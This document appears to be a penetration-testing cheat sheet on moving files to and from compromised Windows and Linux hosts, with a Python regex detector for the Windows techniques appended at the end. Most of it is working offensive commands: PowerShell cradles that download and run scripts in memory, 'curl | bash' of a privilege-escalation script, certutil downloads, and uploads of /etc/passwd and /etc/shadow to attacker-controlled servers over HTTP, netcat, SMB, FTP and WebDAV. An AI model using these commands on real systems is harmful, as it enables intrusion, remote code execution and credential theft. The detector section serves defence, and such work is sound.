File Transfer
For more detailed methods: https://hackersinterview.com/oscp/oscp-cheatsheet-windows-file-transfer-techniques/
Use my transfile.sh script from here
Windows
Powershell
Download file
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.1.2/exploit.exe', 'exploit.exe')
Download and execute without saving on disk
powershell.exe IEX (New-Object System.Net.WebClient).DownloadString('http://192.168.1.2/test.ps1')
To encode using powershell:
[Convert]::ToBase64String((Get-Content -path "C:\Windows\system32\drivers\etc\hosts" -Encoding byte))
To upload using powershell
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')
Invoke-FileUpload -Uri http://10.10.14.24:80/upload -File C:\Windows\System32\drivers\etc\hosts
CMD
certutil -urlcache -f ${file url} filename
powershell wget -Uri http://192.168.45.183/plink.exe -OutFile C:\Windows\Temp\plink.exe
Linux and Windows
Python Server
Attacker:
updog -p 80
OR
python3 -m uploadserver
Target:
Download
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')
Invoke-FileUpload -Uri http://<ip>:8000/upload -File C:\Path\to\file
Upload:
curl -X POST https://192.168.49.128/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecure
To base64 encode:
$b64 = [System.convert]::ToBase64String((Get-Content -Path 'C:\Path\to\file' -Encoding Byte))
Invoke-WebRequest -Uri http://<ip>:8000/ -Method POST -Body $b64
Apache Server
sudo systemctl start apache2
sudo cp /path/to/file.exe /var/www/html/
powershell wget -Uri http://192.168.118.4/nc.exe -OutFile C:\Windows\Temp\nc.exe
SMB
Attacker:
impacket-smbserver NAME $(pwd) -smb2support -user aditya -password aditya
Target (powershell):
copy \\192.168.220.133\share\nc.exe
net use n: \\10.10.14.24\share /user:test test
or
$pass = ConvertTo-SecureString 'aditya' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('aditya', $pass)
New-PSDrive -Name aditya -PSProvider FileSystem -Credential $cred -Root \\10.10.14.24\aditya
cd aditya:
FTP:
Attacker : To Host
python -m pyftpdlib 21
Target:
ftp ${IP}
To Upload:
Attacker:
sudo python3 -m pyftpdlib --port 21 --write
Target:
(New-Object Net.WebClient).UploadFile('ftp://<ip>/ftp-hosts', 'C:\Path\to\File')
echo open 192.168.49.128 > ftpcommand.txt
echo USER anonymous >> ftpcommand.txt
echo binary >> ftpcommand.txt
echo PUT c:\windows\system32\drivers\etc\hosts >> ftpcommand.txt
echo bye >> ftpcommand.txt
ftp -v -n -s:ftpcommand.txt
ftp> open 192.168.49.128
Log in with USER and PASS first.
ftp> USER anonymous
ftp> PUT c:\windows\system32\drivers\etc\hosts
ftp> bye
Webdav (If port 445 restrictions present)
Attacker:
sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous
Target:
dir \\192.168.49.128\DavWWWRoot
copy C:\Users\john\Desktop\SourceCode.zip \\192.168.49.129\DavWWWRoot\
Linux
If no write permissions:
curl 10.10.14.22/linpeas.sh | bash
Bash
#Connect to the Target Webserver
exec 3<>/dev/tcp/10.10.10.32/80
#HTTP GET Request
echo -e "GET /LinEnum.sh HTTP/1.1\n\n">&3
#Print the Response
cat <&3
Netcat
To read files:
nc -nv 192.168.49.249 80 < /etc/passwd
To receive:
nc -nlvp 80
Using netcat to send files:
Target
nc -l -p 1234 -q 1 > something.zip < /dev/null
Attacker
cat something.zip | netcat <ip> 1234
SSH
If creds are available
scp linenum.sh user@remotehost:/remote/path/
Base64
Linux
To get base64 output of the file:
base64 file -w 0
Decode
echo "base64 string" | base64 -d > file
Powershell
[IO.File]::WriteAllBytes("C:\Users\Public\filename", [Convert]::FromBase64String("base64string"))
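The Windows transfer commands listed on this page leave recognisable process command lines. The following is an added example, not part of the original page, that flags them in process-creation events. The event field names (`Computer`, `CommandLine`), host names and sample events are constructed assumptions modelled on process-creation logging with command-line capture.

```python
import re

# Added example: one rule per Windows transfer technique listed on this page.
RULES = {
    "certutil_urlcache": re.compile(r"\bcertutil(\.exe)?\b.*-urlcache\b.*https?://", re.I),
    "webclient_download": re.compile(r"Net\.WebClient\)?\s*\.\s*Download(File|String)\s*\(", re.I),
    "webclient_upload": re.compile(r"Net\.WebClient\)?\s*\.\s*UploadFile\s*\(", re.I),
    "iex_download_cradle": re.compile(r"\b(IEX|Invoke-Expression)\b.*DownloadString", re.I),
    "web_request_to_disk": re.compile(r"\b(wget|curl|iwr|Invoke-WebRequest)\b.*-Uri\b.*-OutFile\b", re.I),
    "ftp_command_script": re.compile(r"\bftp(\.exe)?\b.*\s-s:\S+", re.I),
    "webdav_unc_path": re.compile(r"\\\\[^\\\s]+\\DavWWWRoot\b", re.I),
}

# Constructed sample events (hypothetical hosts; 192.0.2.0/24 is a documentation range).
SAMPLE_EVENTS = [
    {"Computer": "WS01", "CommandLine": "certutil -urlcache -f http://192.0.2.10/tool.exe tool.exe"},
    {"Computer": "WS01", "CommandLine": "powershell.exe IEX (New-Object System.Net.WebClient)"
                                        ".DownloadString('http://192.0.2.10/test.ps1')"},
    {"Computer": "WS02", "CommandLine": "powershell wget -Uri http://192.0.2.10/plink.exe"
                                        " -OutFile C:\\Windows\\Temp\\plink.exe"},
    {"Computer": "WS02", "CommandLine": "ftp -v -n -s:ftpcommand.txt"},
    {"Computer": "WS03", "CommandLine": "cmd.exe /c copy C:\\Users\\john\\Desktop\\SourceCode.zip"
                                        " \\\\192.0.2.10\\DavWWWRoot\\"},
    # Benign activity that must not alert.
    {"Computer": "WS03", "CommandLine": "certutil -verify C:\\certs\\server.cer"},
    {"Computer": "WS04", "CommandLine": "powershell.exe Get-ChildItem C:\\Users"},
]


def match_rules(command_line):
    """Return the sorted names of every rule the command line triggers."""
    return sorted(name for name, rx in RULES.items() if rx.search(command_line))


def triage(events):
    """Return (host, rule names) for each event that hits at least one rule."""
    hits = []
    for event in events:
        rules = match_rules(event["CommandLine"])
        if rules:
            hits.append((event["Computer"], rules))
    return hits


if __name__ == "__main__":
    for host, rules in triage(SAMPLE_EVENTS):
        print(f"{host}: {', '.join(rules)}")
```

Plain string matching like this misses encoded or obfuscated command lines, so treat a hit as a triage lead and tune the rules against your own baseline of administrative activity.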